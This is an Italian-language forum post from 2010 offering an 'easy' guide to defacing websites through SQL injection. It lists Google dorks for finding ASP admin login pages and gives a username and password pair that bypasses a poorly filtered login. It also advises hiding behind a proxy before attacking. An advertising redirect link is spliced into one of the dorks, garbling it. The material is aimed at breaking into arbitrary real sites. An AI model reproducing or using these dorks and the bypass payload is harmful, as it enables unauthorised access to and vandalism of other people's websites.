Valerio Amministratore
Messaggi : 107 Crediti : 25118 Registrato Dal : 17.10.10 Età : 27 Località : Ardea
| Titolo: Come defacciare siti con SQL Injection [FACILE] Dom Ott 24, 2010 5:55 pm | |
| Salve ragazzi, ho creato questa guida per far scomparire tutti i topic da lamer in cui c'è scritto: "Ho defacciato un sito!" o "Sito vulnerabile!!!" Dopo aver seguito questa guida chiunque potrà cimentarsi nella tecnica delle SQL Injection. Qui posterò alcune dork che potrete utilizzare per trovare siti vulnerabili. Le dork non sono altro che dei codici che fornisce google per cercare una determinata cosa. Le dork devono essere inserite nella barra di ricerca Google e vi troverà tutti i risultati. Io consiglio di utilizzare un proxy prima di defacciare un sito.
- Codice:
-
inurl:reserved.[url=http://adv.edintorni.net/click/?mo=L&ky=asp&af=7651&ct=it&rf=http%3A%2F%2Fwww%2Esciax2%2Eit%2Fforum%2Fguide%2Dtutorial%2Fcome%2Ddefacciare%2Dsiti%2Dsql%2Dinjection%2Dfacile%2D204760%2Ehtml&re=&ts=1287935603437&hs=5f7b2ad86bbec68f66c097b7680e9520]asp[/url] inurl:/admin.asp" inurl:/admin/login.asp inurl:/admin/logon.asp inurl:/admin_login.asp inurl:/admin_logon.asp inurl:/admin/adminlogin.asp inurl:/admin/adminlogon.asp inurl:/admin/admin_login.asp inurl:/login.asp inurl:/admin/admin.asp inurl:/admin/admin_logon.asp inurl:/administrator/admin.asp inurl:/administrator/login.asp inurl:/logon.asp inurl:/adminlogin.asp inurl:/adminlogon.asp inurl:/administrator/logon.asp inurl:root/login.asp inurl:admin/index.asp
Nella barra del username inserite: admin Nella barra della password inserite: 'or''='
Questa stringa di codice sfrutta un bug del login filtrato. |
|